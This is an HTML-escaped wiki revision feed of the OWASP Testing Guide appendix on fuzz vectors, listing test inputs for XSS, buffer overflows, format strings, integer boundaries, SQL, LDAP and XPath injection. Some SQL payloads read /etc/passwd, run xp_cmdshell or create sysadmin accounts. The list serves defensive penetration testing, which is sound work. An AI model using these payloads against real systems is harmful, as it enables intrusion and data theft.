&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13694</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13694"/>
				<updated>2006-11-26T11:49:23Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Recursive fuzzing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
